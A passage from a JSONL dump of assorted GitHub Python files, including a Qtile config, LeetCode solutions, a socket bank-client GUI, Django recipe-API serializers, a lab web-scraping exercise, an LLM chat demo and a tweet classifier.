desc=\"Shutdown Qtile\"),\n Key([mod], \"r\", lazy.spawn(\"dmenu_run\"), desc=\"launch dmenu\"),\n Key([mod], \"s\", lazy.spawn(\"xfce4-settings-manager\"), desc=\"settings\"),\n\n #### APPS ####\n Key([mod], \"b\", lazy.spawn(\"brave\"), desc=\"Launches brave browser\"),\n Key([mod], \"c\", lazy.spawn(\"codium\"), desc=\"open vscode\"),\n Key([mod], \"q\", lazy.spawn(\"pcmanfm\"), desc=\"open file explorer\"),\n\n # Toggle keyboard layout\n Key([mod],\"f11\", lazy.widget[\"keyboardlayout\"].next_keyboard(), desc=\"Next keyboard layout\"),\n\n # Media\n Key([], \"XF86AudioLowerVolume\", lazy.spawn(\"amixer sset Master 2%-\"), desc=\"Lower Volume by 2%\"),\n Key([], \"XF86AudioRaiseVolume\", lazy.spawn(\"amixer sset Master 2%+\"), desc=\"Raise Volume by 2%\")\n]\n\ngroups = [Group(i) for i in \"1234567\"]\n\nfor i in groups:\n keys.extend(\n [\n Key(\n [mod],\n i.name,\n lazy.group[i.name].toscreen(),\n desc=\"Switch to group {}\".format(i.name),\n ),\n Key(\n [mod, \"shift\"],\n i.name,\n lazy.window.togroup(i.name, switch_group=True),\n desc=\"Switch to & move focused window to group {}\".format(i.name),\n ),\n ]\n )\n\nlayouts = [\n layout.Tile(\n margin = 12,\n border_focus=\"51E0F0\",\n border_width=2),\n]\n\nwidget_defaults = dict(\n font=\"sans\",\n fontsize=12,\n padding=3,\n)\nextension_defaults = widget_defaults.copy()\n\nscreens = [\n Screen(\n wallpaper=\"/home/noisefuck/Pictures/blue1.jpeg\",\n wallpaper_mode='fit',\n top=bar.Bar(\n [\n widget.GroupBox(font=\"sans Bold\",\n this_current_screen_border=\"51E0F0\",\n border_width=20),\n widget.Prompt(),\n widget.WindowName(foreground=\"51E0F0\",\n font=\"sans Bold\"),\n widget.Chord(\n chords_colors={\n \"launch\": (\"#ff0000\", \"#ffffff\"),\n },\n name_transform=lambda name: name.upper(),\n ),\n widget.Systray(),\n widget.Battery(background=[\"1F1F1F\"], # Just to create the last arrow effect\n foreground=\"131313\",\n fontsize=0.1,\n **powerline),\n widget.CheckUpdates(distro='Arch_checkupdates',\n update_interval=1800,\n display_format=\"🗘 : {updates}\",\n no_update_string=\"🗘 : 0\",\n font=\"sans Bold\",\n colour_no_updates=\"FFFFFF\",\n foreground=\"FFFFFF\",\n background=\"51E0F0\",\n **powerline),\n widget.CPU(format=\" {freq_current}GHz {load_percent}%\",\n foreground=\"FFFFFF\",\n background=\"5180F0\",\n font=\"sans Bold\",\n **powerline),\n widget.Memory(measure_mem='G',\n foreground=\"FFFFFF\",\n background=\"51E0F0\",\n font=\"sans Bold\",\n **powerline),\n widget.Net(interface=\"enp8s0\",\n format='↑{up} ↓{down}',\n foreground=\"FFFFFF\",\n background=\"5180F0\",\n font=\"sans Bold\",\n **powerline),\n widget.Clock(format=\"%d-%m %a %I:%M %p\",\n foreground=\"FFFFFF\",\n background=\"51E0F0\",\n font=\"sans Bold\",\n **powerline),\n widget.PulseVolume(foreground=\"FFFFFF\",\n background=\"5180F0\",\n font=\"sans Bold\",\n **powerline),\n widget.KeyboardLayout(configured_keyboards=['us','gr'],\n foreground=\"FFFFFF\",\n font=\"sans Bold\",\n background=\"51E0F0\",\n **powerline),\n ],\n 22, background=[\"1F1F1F\"],\n ),\n ),\n]\n\nmouse = [\n Drag([mod], \"Button1\", lazy.window.set_position_floating(), start=lazy.window.get_position()),\n Drag([mod], \"Button3\", lazy.window.set_size_floating(), start=lazy.window.get_size()),\n Click([mod], \"Button2\", lazy.window.bring_to_front()),\n]\n\ndgroups_key_binder = None\ndgroups_app_rules = [] # type: list\nfollow_mouse_focus = True\nbring_front_click = False\ncursor_warp = False\nfloating_layout = layout.Floating(\n float_rules=[\n *layout.Floating.default_float_rules,\n Match(wm_class=\"confirmreset\"), # gitk\n Match(wm_class=\"makebranch\"), # gitk\n Match(wm_class=\"maketag\"), # gitk\n Match(wm_class=\"ssh-askpass\"), # ssh-askpass\n Match(title=\"branchdialog\"), # gitk\n Match(title=\"pinentry\"), # GPG key password entry\n ]\n)\nauto_fullscreen = True\nfocus_on_window_activation = \"smart\"\nreconfigure_screens = True\n\nauto_minimize = True\n\nwl_input_rules = None\n\nwmname = \"LG3D\"\n\n######################################################################\n\n# __ _ ___ _ _ #\n# /\\ \\ \\ ___ (_) ____ / __\\ ___ __| |(_) _ __ __ _ #\n# / \\/ // _ \\ | ||_ /_____ / / / _ \\ / _` || || '_ \\ / _` | #\n# / /\\ /| (_) || | / /|_____|/ /___| (_) || (_| || || | | || (_| | #\n# \\_\\ \\/ \\___/ |_|/___| \\____/ \\___/ \\__,_||_||_| |_| \\__, | #\n# |___/ #\n\n######################################################################\n","repo_name":"NoizCode/config","sub_path":"qtile/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":8873,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"39"}
+{"seq_id":"73918520755","text":"#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n__author__ = 'Yuanqin Lu'\n\nclass Solution(object):\n def search(self, nums, target):\n \"\"\"\n :type nums: List[int]\n :type target: int\n :rtype: bool\n \"\"\"\n length = len(nums)\n left, right = 0, length-1\n while left <= right:\n mid = (left + right) / 2\n if nums[mid] == target:\n return True\n while left < mid and nums[left] == nums[mid]:\n left += 1\n if nums[left] <= nums[mid]:\n if nums[left] <= target < nums[mid]:\n right = mid - 1\n else:\n left = mid + 1\n else:\n if nums[mid] < target <= nums[right]:\n left = mid + 1\n else:\n right = mid - 1\n return False\n\n","repo_name":"lisabug/leetcode","sub_path":"Python/081_search_in_rotated_sorted_array_II.py","file_name":"081_search_in_rotated_sorted_array_II.py","file_ext":"py","file_size_in_byte":881,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"}
+{"seq_id":"70158530034","text":"from socket import *\r\nimport PySimpleGUI as sg\r\nfrom time import sleep\r\n\r\n\r\nhost = gethostbyname(gethostname())\r\nport = 50000\r\n\r\n#conexão com o servidor\r\n\r\nclient = socket(AF_INET, SOCK_STREAM)\r\nclient.connect((host, port))\r\n\r\n#layout\r\n\r\nsoma = 0\r\nsaldo = 500\r\nfalha = 0\r\nopcao = 0\r\n\r\n\r\ndef menu():\r\n global opcao, saldo\r\n sg.theme('DarkGrey2')\r\n layout=[\r\n [sg.Text('Clique na opção desejada:', size = (20, 2), font=16)],\r\n [sg.Button('Depositar', size = (30, 1), font=16)],\r\n [sg.Button('Sacar', size=(30, 1), font=16)],\r\n [sg.Button('Ver saldo', size=(30, 1), font=16)],\r\n [sg.Button('Sair')]\r\n ]\r\n\r\n menu = sg.Window('Eagle Bank', layout=layout, finalize= True)\r\n\r\n while True:\r\n eventos, valores = menu.read()\r\n if eventos == 'Sair' or sg.WINDOW_CLOSED:\r\n sg.popup('Finalizando...')\r\n break\r\n if eventos == 'Ver saldo':\r\n saldo = float(saldo)\r\n sg.popup(f'Seu saldo atual é: R${saldo:.2f}')\r\n if eventos == 'Depositar':\r\n opcao = 1\r\n client.send(str(opcao).encode())\r\n menu.hide()\r\n depositar()\r\n menu.un_hide()\r\n if eventos == 'Sacar':\r\n opcao = 2\r\n client.send(str(opcao).encode())\r\n menu.hide()\r\n sacar()\r\n menu.un_hide()\r\n\r\n\r\n menu.close()\r\n\r\n\r\ndef login():\r\n global soma\r\n sg.theme('DarkGrey2')\r\n layout = [\r\n [sg.Text('CPF', size = (11,1), font = 16)],\r\n [sg.InputText(key='login', font=10)],\r\n [sg.Text('Senha', size = (11, 1), font = 16)],\r\n [sg.InputText(key='senha', password_char= '*', font=10)],\r\n [sg.Button('Entrar'), sg.Button('Sair')]\r\n ]\r\n login = sg.Window('Eagle Bank', layout=layout, finalize=True)\r\n\r\n while True:\r\n eventos, valores = login.read()\r\n if eventos == 'Sair':\r\n sg.popup('Encerrando.')\r\n null = '0'\r\n client.send(null.encode())\r\n client.send(null.encode())\r\n break\r\n if eventos == 'Entrar':\r\n username = valores['login']\r\n password = valores['senha']\r\n client.send(username.encode())\r\n client.send(password.encode())\r\n msg = client.recv(1024).decode()\r\n if msg == 'Logado com sucesso':\r\n sg.popup('Autenticação concluída!')\r\n login.hide()\r\n menu()\r\n break\r\n elif msg != 'Logado com sucesso':\r\n sg.popup('Credenciais incorretas!')\r\n soma = soma + 1\r\n if soma == 3:\r\n sg.popup('Número de tentativas excedido. \\n Finalizando...')\r\n sleep(1.5)\r\n client.close()\r\n break\r\n login.close()\r\n\r\n\r\ndef depositar():\r\n global saldo\r\n sg.theme('DarkGrey2')\r\n layout=[\r\n [sg.Text('Valor a ser depositado: ', size=(16,1), font=16)],\r\n [sg.InputText(key='valor', font=11)],\r\n [sg.Button('Confirmar'), sg.Button('Voltar')],\r\n ]\r\n\r\n depositar = sg.Window('Eagle Bank', layout=layout, finalize = True)\r\n\r\n while True:\r\n eventos, valores = depositar.read()\r\n if 'Confirmar':\r\n valor = valores['valor']\r\n client.send(valor.encode())\r\n valor = client.recv(1024).decode()\r\n valor = float(valor)\r\n saldo = valor\r\n sg.popup(f'Valor em conta atualizado: R${valor:.2f}')\r\n break\r\n depositar.close()\r\n\r\n\r\ndef sacar():\r\n global saldo, valor\r\n sg.theme('DarkGrey2')\r\n layout=[\r\n [sg.Text('Valor a ser sacado: ', size=(10,1), font=16)],\r\n [sg.Input(key='valor', font=11)],\r\n [sg.Button('Confirmar'), sg.Button('voltar')]\r\n ]\r\n\r\n sacar = sg.Window('Eagle Bank', layout=layout, finalize=True)\r\n\r\n while True:\r\n eventos, valores = sacar.read()\r\n if eventos == 'Confirmar':\r\n valor = valores['valor']\r\n client.send(valor.encode())\r\n print(saldo)\r\n saldo = client.recv(1024).decode()\r\n print(saldo)\r\n saldo = float(saldo)\r\n print(saldo)\r\n sg.popup(f'Seu saldo atualizado é de R${saldo}')\r\n break\r\n sacar.close()\r\n\r\n\r\n#criar um bloco de leitura de eventos\r\nlogin()\r\n\r\n","repo_name":"Ekaly/vscode","sub_path":"Cliente.py","file_name":"Cliente.py","file_ext":"py","file_size_in_byte":4419,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"}
+{"seq_id":"3318258404","text":"from django.urls import path\nfrom .views import AddStudentView, DetectionView, UpdateStudentImageView, DeleteStudentView, TrainView\n\nurlpatterns = [\n path('create-student', AddStudentView.as_view()),\n path('update-student-image', UpdateStudentImageView.as_view()),\n path('delete-student', DeleteStudentView.as_view()),\n path('train', TrainView.as_view()),\n path('detect', DetectionView.as_view())\n]\n","repo_name":"ruizhiwang11/face_reco_attendence_system","sub_path":"backend/face_reco_attendence_system/api/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":414,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"}
+{"seq_id":"36926069312","text":"############################\n# LESSON MAKER FOR STUYCCC #\n############################\n\n########## The lesson maker syntax ##########\n#\n# First line should be lesson title\n# Text without preceding formatter will be treated as plaintext in a
tag\n# A blank line will be treated as a tag\n#\n# Open an ordered list with \"!!olist!!\"\n# Close an ordered list with \"!!endolist!!\"\n#\n# Open an unordered list with \"!!ulist!!\"\n# Close an unordered list with \"!!endulist!!\"\n#\n# Add an image with \"image()\" --> absolute dir, not relative\n#\n# Add a link with \"a[]()\"\n#\n# Add your own custom html between \"!!html!!\" and \"!!endhtml!!\"\n#\n# start a heading with !!h!!. It will be one line\n#\n# <, >, &, and TABs will automatically be replaced with their html equivalents\n#\n# For spacing, use !!breaks!!, being the number of breaks you want\n#\n# others shall be added l8r\n#\n#############################################\n\nimport re\n\ndef go():\n #take filename input and read it\n f = input(\"Input filename: \")\n straw = open(f, 'r')\n pretext = straw.read()\n straw.close()\n\n #start html file\n html = \"\"\n\n #replace >, <, &, and TABs\n pretext = pretext.replace('&', '&')\n pretext = pretext.replace('\\t', ' ')\n pretext = pretext.replace('<', '<')\n pretext = pretext.replace('>', '>')\n\n #fill in html\n pretext = pretext.split('\\n')\n\n html += '
' + pretext[0] + '
\\n' #adds title\n\n in_list = False #will be true if in olist --> precedes every element with
\n in_html = False #will be true if user is adding custom html --> will ignore all steps and paste users html in file\n\n for i in pretext[1:]:\n if i[:10] == '!!breaks!!':\n num = int(i[10:])\n html += ' \\n' * num\n continue\n if in_html:\n if i != '!!endhtml!!':\n html += i.replace('>', '>').replace('<', '<').replace(' ', '\\t').replace('&', '&') + '\\n'\n else:\n in_html = False\n continue\n if in_list:\n if i != '!!endulist!!' and i != '!!endolist!!':\n html += '
\\n'\n else:\n if i == '!!endulist!!':\n html += '\\n\\n'\n else:\n html += '\\n\\n'\n in_list = False\n continue\n if i == '':\n html += ' \\n'\n continue\n\n #check for list\n x = re.match(r'!![a-zA-Z]*!!', i)\n if x != None:\n found = x.group()\n\n #ordered lists\n if found.strip('!') == 'olist':\n html += '\\n\\n'\n in_list = True\n\n #unordered lists\n elif found.strip('!') == 'ulist':\n html += '\\n
\\n'\n continue\n\n #check for img url\n x = re.match(r'image\\(https?://.*\\)', i)\n if x != None:\n html += '\\n'\n continue\n\n #check for hyperlink\n x = re.match(r'a\\[.*\\]\\(https*://.*\\)', i)\n if x != None:\n full = x.group()\n inner_text = re.search(r'\\[.*\\]', full).group()[1:-1]\n url = re.search(r'\\(https*://.*\\)', full).group()[1:-1]\n html += '
\\n'\n continue\n\n #check for heading\n x = re.search(r'!!h\\d!!', i)\n if x != None and x.end() == 6:\n tier = x.group().strip('!h')\n html += '\\n' + i[6:] + '\\n\\n'\n continue\n\n\n #if nothing else worked\n html += '
' + i + '
\\n'\n\n if in_list:\n html += '
\\n'\n\n html += \"\"\n\n straw = open(f.rsplit('.', 1)[0] + '.html', 'w')\n straw.write(html)\n straw.close()\n\n print(\"Wrote to \" + f.rsplit('.', 1)[0] + \".html\")\n\n\ngo()\n","repo_name":"JoanChirinos/StuyCCC","sub_path":"Lessons/lessonMaker.py","file_name":"lessonMaker.py","file_ext":"py","file_size_in_byte":4371,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"39"}
+{"seq_id":"24791638087","text":"import base64\n\nfrom django.core.files.base import ContentFile\nfrom django.shortcuts import get_object_or_404\nfrom recipes.models import (Favorite, Follow, Ingredient, IngredientInRecipe,\n Recipe, ShoppingCart, Tag, )\nfrom rest_framework import serializers\nfrom rest_framework.serializers import ModelSerializer\n\nfrom users.models import User\n\n\nclass Base64ImageField(serializers.ImageField):\n\n def to_internal_value(self, data):\n \"\"\"Преобразование ка��тинки\"\"\"\n\n if isinstance(data, str) and data.startswith('data:image'):\n format, imgstr = data.split(';base64,')\n ext = format.split('/')[-1]\n data = ContentFile(base64.b64decode(imgstr), name='photo.' + ext)\n\n return super().to_internal_value(data)\n\n\nclass TagSerializer(ModelSerializer):\n \"\"\"Вывод тэгов.\"\"\"\n\n class Meta:\n model = Tag\n fields = ('id', 'name', 'color', 'slug')\n\n\nclass IngredientSerializer(ModelSerializer):\n \"\"\"вывод ингредиентов.\"\"\"\n\n class Meta:\n model = Ingredient\n fields = ('id', 'name', 'measurement_unit')\n\n\nclass UsersSerializer(serializers.ModelSerializer):\n \"\"\"\n Сериализатор выдачи информации о user.\n \"\"\"\n is_subscribed = serializers.SerializerMethodField()\n\n class Meta:\n model = User\n fields = (\n 'id',\n 'username',\n 'email',\n 'first_name',\n 'last_name',\n 'is_subscribed'\n )\n\n def get_is_subscribed(self, obj):\n \"\"\"\n Проверка на подписку.\n \"\"\"\n user_me = self.context['request'].user\n if not user_me.is_authenticated:\n return False\n return user_me.follower.filter(author=obj).exists()\n\n\nclass IngredientInRecipeSerializer(serializers.ModelSerializer):\n id = serializers.ReadOnlyField(source='ingredient.id')\n name = serializers.ReadOnlyField(source='ingredient.name')\n measurement_unit = serializers.ReadOnlyField(\n source='ingredient.measurement_unit')\n\n class Meta:\n model = IngredientInRecipe\n fields = ('id', 'name', 'measurement_unit', 'amount')\n\n\nclass RecipeViewSerializer(serializers.ModelSerializer):\n tags = TagSerializer(many=True)\n author = UsersSerializer()\n ingredients = IngredientInRecipeSerializer(\n source='ingredient_list', many=True)\n is_favorited = serializers.SerializerMethodField()\n is_in_shopping_cart = serializers.SerializerMethodField()\n\n class Meta:\n model = Recipe\n fields = (\n 'id',\n 'tags',\n 'author',\n 'ingredients',\n 'is_favorited',\n 'is_in_shopping_cart',\n 'name',\n 'image',\n 'text',\n 'cooking_time',\n )\n\n def get_is_favorited(self, obj):\n \"\"\"Проверка на добавление в избранное.\"\"\"\n\n request = self.context['request'].user\n if not request.is_authenticated:\n return False\n return Favorite.objects.filter(\n user=request, recipe=obj\n ).exists()\n\n def get_is_in_shopping_cart(self, obj):\n \"\"\"проверка на наличие в корзине.\"\"\"\n\n request = self.context['request'].user\n if not request.is_authenticated:\n return False\n return ShoppingCart.objects.filter(\n user=request, recipe=obj\n ).exists()\n\n\nclass RecipeSerializer(serializers.ModelSerializer):\n \"\"\"\n Сериализатор для выдачи рецепта(ов) с общей информацией.\n \"\"\"\n\n class Meta:\n model = Recipe\n fields = (\n 'id',\n 'name',\n 'image',\n 'cooking_time'\n )\n\n\nclass CreateIngredientsInRecipeSerializer(serializers.ModelSerializer):\n \"\"\"Сериализатор для ингредиентов в рецептах\"\"\"\n\n id = serializers.IntegerField()\n amount = serializers.IntegerField()\n\n @staticmethod\n def validate_amount(value):\n \"\"\"Валидация количества\"\"\"\n\n if value < 1:\n raise serializers.ValidationError(\n 'Количество ингредиента должно быть больше 0!'\n )\n return value\n\n class Meta:\n model = IngredientInRecipe\n fields = ('id', 'amount')\n\n\nclass CreateRecipeSerializer(serializers.ModelSerializer):\n \"\"\"Создание рецептов\"\"\"\n\n ingredients = CreateIngredientsInRecipeSerializer(many=True)\n tags = serializers.PrimaryKeyRelatedField(\n many=True, queryset=Tag.objects.all()\n )\n image = Base64ImageField(use_url=True)\n\n class Meta:\n model = Recipe\n fields = ('ingredients', 'tags', 'name',\n 'image', 'text', 'cooking_time')\n\n def to_representation(self, instance):\n \"\"\"Представление модели\"\"\"\n\n serializer = RecipeViewSerializer(\n instance,\n context={\n 'request': self.context.get('request')\n }\n )\n return serializer.data\n\n def validate(self, data):\n \"\"\"Валидация ингредиентов\"\"\"\n\n ingredients = self.initial_data.get('ingredients')\n lst_ingredient = []\n\n for ingredient in ingredients:\n if ingredient['id'] in lst_ingredient:\n raise serializers.ValidationError(\n 'Ингредиенты должны быть уникальными!'\n )\n lst_ingredient.append(ingredient['id'])\n return data\n\n def recipe_create_or_update(self, instance, validated_data):\n \"\"\"\n Метод для создания или обновления ингредиентов и тегов.\n \"\"\"\n ingredients, tags = (\n validated_data.pop('ingredients'), validated_data.pop('tags')\n )\n for item in ingredients:\n cur_obj, _ = IngredientInRecipe.objects.get_or_create(\n recipe=instance,\n ingredient=get_object_or_404(Ingredient, pk=item['id']),\n amount=item['amount']\n )\n for item in tags:\n instance.tags.add(item)\n\n return instance\n\n def create(self, validated_data):\n raw_data = {\n 'ingredients': validated_data.pop('ingredients'),\n 'tags': validated_data.pop('tags')\n }\n recipe = Recipe.objects.create(**validated_data)\n return self.recipe_create_or_update(recipe, raw_data)\n\n def update(self, instance, validated_data):\n instance.ingredients.clear()\n instance.tags.clear()\n instance = self.recipe_create_or_update(instance, validated_data)\n return super().update(instance, validated_data)\n\n\nclass FavoriteSerializer(serializers.ModelSerializer):\n \"\"\"\n Сериализатор для выдачи избранных рецептов.\n \"\"\"\n\n class Meta:\n model = Favorite\n fields = (\n 'user',\n 'recipe'\n )\n\n def validate(self, data):\n if Favorite.objects.filter(\n user=data['user'],\n recipe=data['recipe']\n ):\n raise serializers.ValidationError(\n f'Рецепт - {data[\"recipe\"]} уже есть в избранном'\n )\n return data\n\n def to_representation(self, instance):\n return RecipeSerializer(instance.recipe).data\n\n\nclass FollowSerializer(UsersSerializer):\n \"\"\"\n Сериализатор для выдачи подписок.\n \"\"\"\n recipes_count = serializers.SerializerMethodField()\n recipes = serializers.SerializerMethodField()\n\n class Meta:\n model = User\n fields = (\n 'id',\n 'username',\n 'email',\n 'first_name',\n 'last_name',\n 'is_subscribed',\n 'recipes',\n 'recipes_count'\n )\n\n def get_recipes(self, author):\n \"\"\"\n При наличии в параметрах запроса recipes_limit происходит\n выдача среза списка с ингредиентами.\n \"\"\"\n request = self.context.get('request')\n recipes_limit = request.query_params.get('recipes_limit')\n if recipes_limit:\n return RecipeSerializer(\n Recipe.objects.filter(author=author)[:int(recipes_limit)],\n context={'queryset': request},\n many=True\n ).data\n return RecipeSerializer(\n Recipe.objects.filter(author=author),\n context={'queryset': request},\n many=True\n ).data\n\n def get_recipes_count(self, obj):\n \"\"\"\n Подсчет количества рецептов автора.\n \"\"\"\n return obj.recipes.count()\n\n\nclass FollowPostSerializer(serializers.ModelSerializer):\n \"\"\"\n Сериализатор для создание запроса на подписку.\n \"\"\"\n\n class Meta:\n model = Follow\n fields = (\n 'author',\n 'user'\n )\n\n def validate(self, data):\n user_me = self.context['request'].user\n if user_me == data['author']:\n raise serializers.ValidationError(\n 'Нельзя подписываться на самого себя!'\n )\n if Follow.objects.filter(\n author=data['author'],\n user=user_me):\n raise serializers.ValidationError(\n f'Вы подписаны на автора {data[\"author\"]}!'\n )\n return data\n\n def to_representation(self, instance):\n return FollowSerializer(\n instance.author,\n context={'request': self.context.get('request')}\n ).data\n\n\nclass ShoppingCartSerializer(serializers.ModelSerializer):\n \"\"\"\n Сериализатор для списка покупок автора.\n \"\"\"\n\n class Meta:\n model = ShoppingCart\n fields = (\n 'user',\n 'recipe'\n )\n\n def validate(self, data):\n if ShoppingCart.objects.filter(\n user=data['user'],\n recipe=data['recipe']\n ):\n raise serializers.ValidationError(\n f'Рецепт - {data[\"recipe\"]} уже есть в списке покупок'\n )\n return data\n\n def to_representation(self, instance):\n return RecipeSerializer(instance.recipe).data\n","repo_name":"ElenaAntonenko/foodgram-project-react","sub_path":"backend/api/serializer.py","file_name":"serializer.py","file_ext":"py","file_size_in_byte":10757,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"}
+{"seq_id":"72706654194","text":"'''\nHow to reverse an integer\n\nDesign an efficient algorithm to reverse a given integer.\n\nExample:\n\ninput: 1234\noutput: 4321\n'''\n\n# Use the module operator to collect the last digit\n# Then use integer division to delete the last digit\n# build the new integer up tens-place by tens-place\ndef reverse_integer(n: int) -> int:\n reverse = 0\n remainder = 0\n \n while (n > 0):\n remainder = n % 10\n n = n // 10\n reverse = reverse * 10 + remainder\n return reverse\n\nif __name__ == '__main__':\n print(reverse_integer(12345678))","repo_name":"EandrewJones/algorithms","sub_path":"interview_questions/arrays/reverse_integer.py","file_name":"reverse_integer.py","file_ext":"py","file_size_in_byte":554,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"}
+{"seq_id":"28124967662","text":"# coding=utf-8\n# Implements stream chat in command line for fine-tuned models.\n# Usage: python cli_demo.py --model_name_or_path path_to_model --checkpoint_dir path_to_checkpoint\n\n\nfrom utils import (\n Template,\n load_pretrained,\n prepare_infer_args,\n get_logits_processor\n)\nfrom threading import Thread\nfrom transformers import TextIteratorStreamer\n\n\ndef main():\n\n model_args, data_args, finetuning_args, generating_args = prepare_infer_args()\n # model_name = \"BLOOM\" if \"bloom\" in model_args.model_name_or_path else \"LLaMA\"\n model_name = \"仲景\"\n model, tokenizer = load_pretrained(model_args, finetuning_args)\n\n prompt_template = Template(data_args.prompt_template)\n streamer = TextIteratorStreamer(tokenizer, timeout=60.0, skip_prompt=True, skip_special_tokens=True)\n\n def predict_and_print(query, history: list):\n input_ids = tokenizer([prompt_template.get_prompt(query, history)], return_tensors=\"pt\")[\"input_ids\"]\n input_ids = input_ids.to(model.device)\n\n gen_kwargs = generating_args.to_dict()\n gen_kwargs[\"input_ids\"] = input_ids\n gen_kwargs[\"logits_processor\"] = get_logits_processor()\n gen_kwargs[\"streamer\"] = streamer\n\n thread = Thread(target=model.generate, kwargs=gen_kwargs)\n thread.start()\n response = \"\"\n print(\"{}: \".format(model_name), end=\"\")\n for new_text in streamer:\n print(new_text, end=\"\", flush=True)\n response += new_text\n print()\n history = history + [(query, response)]\n return history\n\n history = []\n print(\"欢迎使用 {} 模型,输入内容即可对话,clear清空对话历史,stop终止程序\".format(model_name))\n while True:\n try:\n query = input(\"\\nInput: \")\n except UnicodeDecodeError:\n print(\"Detected decoding error at the inputs, please set the terminal encoding to utf-8.\")\n continue\n except Exception:\n raise\n\n if query.strip() == \"stop\":\n break\n\n if query.strip() == \"clear\":\n history = []\n print(\"History has been removed.\")\n continue\n\n history = predict_and_print(query, history)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"Zlasejd/HuangDI","sub_path":"src/cli_demo.py","file_name":"cli_demo.py","file_ext":"py","file_size_in_byte":2264,"program_lang":"python","lang":"en","doc_type":"code","stars":27,"dataset":"github-code","pt":"39"}
+{"seq_id":"10611437673","text":"#Change user-agent to anything appropriate\n# Get links of reference webpages stored in a .json file\n#print out image links from given url\nimport scrapy\nfrom scrapy.crawler import CrawlerProcess\nimport re\nimport requests \n\n######## TASK 5\n#modded useragent\nfakeuseragent = { 'User-Agent': \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36 AppleWebKit/537.36 (KHTML, like Gecko)\"}\nmoduseragent = { 'user-Agent':\"Mobile\"}\n\n#set target webpage\nurl = 'http://172.18.58.238/headers.php'\n\n##\ndef Task5():\n\n #GET\n r = requests.Session()\n request = r.get(url, headers=fakeuseragent)\n statusCode = request.status_code\n #header\n header = request.headers\n\n #to change header type to mobile\n header.update(moduseragent)\n new_request = r.get(url, headers=header)\n\n\n Task5File = open(\"task5.txt\", \"w\")\n Task5File.write(f\"{request.status_code}\\n{header}\\n$$$ Modded: \\n{moduseragent}\\n{new_request.headers}\")\n\n if statusCode == 200:\n print(\"OK\")\n else:\n print(\"Error status code: %s\"%statusCode)\n print(\"\\n$$$ Modded: \\n\", moduseragent)\n print(new_request.headers)\n\nclass parseTask6(scrapy.Spider):\n\n name = 'task6'\n #test url\n start_urls = ['http://172.18.58.238/index.php']\n open(\"task6.json\", 'w').close()\n def parse(self, response):\n Task6 = open(\"task6.json\", 'a')\n for link in response.css('a'):\n link_results = link.css('a::attr(href)').get()\n Task6.write(str({'results': link_results})+\"\\n\")\n Task6.close()\n\n#image urls extractions\nclass parseImages(scrapy.Spider):\n img_list=[]\n name = 'task7'\n allowed_domains = ['172.18.58.238']\n \n start_urls = ['http://172.18.58.238/index.php']\n \n \n def parse(self, response):\n url = response.url \n for i in response.css('img::attr(src)').extract():\n if '.jpg':\n self.img_list.append(url + i)\n \n for u in response.css('img::attr(src)').extract():\n if u is not None:\n yield response.follow(u, callback=self.parse)\n\n \n\n print(img_list)\n \n \nTask5()\nprocess = CrawlerProcess()\nprocess.crawl(parseTask6)\nprocess.crawl(parseImages)\nprocess.start()","repo_name":"BAPESHOTZ/REPO-STUFFZ","sub_path":"scrapy.py","file_name":"scrapy.py","file_ext":"py","file_size_in_byte":2280,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"39"}
+{"seq_id":"30315625650","text":"import re\nimport os\n\n\n#classified tweets according to hashtag\ndef isLeave(filename):\n\tleavePath = './labeled_tweets/leave'\n\tleaveTweets = open(leavePath, 'a')\n\tglobal leaveCnt\n\n\tremainPath = './labeled_tweets/remain'\n\tremainTweets = open(remainPath, 'a')\n\tglobal remainCnt\n\n\tsourcePath = './tweets_by_month/' + filename\n\n\twith open(sourcePath) as f:\n\t\tfor line in f:\n\t\t\tline = line.lower()\n\t\t\tline = re.sub(r'\\|\\~|\\`|\\!|\\$|\\%|\\^|\\&|\\*|\\(|\\)|\\-|\\_|\\+|\\=|\\||\\\\|\\[|\\]|\\{|\\}|\\;|\\:|\\\"|\\'|\\,|\\<|\\.|\\>|\\/|\\?', \" \", line)\n\t\t\tif re.search('#voteleave|#leave|#takecontrol|#leaveeu', line):\n\t\t\t\tleaveTweets.write(line)\n\t\t\t\tleaveCnt = leaveCnt + 1\n\t\t\tif re.search('#voteremain|#remain|#strongerin|#labourinforbritain|#intogether', line):\n\t\t\t\tremainTweets.write(line)\n\t\t\t\tremainCnt = remainCnt + 1\n\nif __name__=='__main__':\n\n\tleaveCnt = 0\n\tremainCnt = 0\n\tpath = './tweets_by_month/'\n\tfor root, dirs, files in os.walk(path):\n\t\tfor filename in files:\n\t\t\tisLeave(filename)\n\tprint(leaveCnt)\n\tprint(remainCnt)\n\n\n","repo_name":"BrexitProject/TweetsMining","sub_path":"isLeave.py","file_name":"isLeave.py","file_ext":"py","file_size_in_byte":994,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"39"}
